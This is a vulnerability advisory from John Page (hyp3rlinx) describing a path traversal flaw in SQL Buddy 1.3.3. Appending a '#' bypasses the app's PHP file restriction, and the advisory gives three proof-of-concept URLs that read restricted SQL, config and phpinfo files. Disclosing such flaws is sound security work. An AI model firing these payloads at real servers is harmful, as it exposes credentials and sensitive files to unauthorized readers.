Sqlbuddy Path Traversal Vulnerability

[hyp3rlinx () altervista org]

Exploit Author: John Page (hyp3rlinx) 
Website: hyp3rlinx.altervista.org/ 
Vendor Homepage: www.sqlbuddy.com
Version: 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information: ================== sqlbuddy suffers from directory traversal whereby a user can move about 
directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. 
.doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and 
rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal 
sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx> POC 

Exploit payloads: ======================= 1-Read from Apache restricted directory under htdocs: 
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP 
extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as 
phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Severity Level: =============== High

Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected 
Area(s): [+] Server directories & sensitive files Solution - Fix & 

Patch: ======================= N/A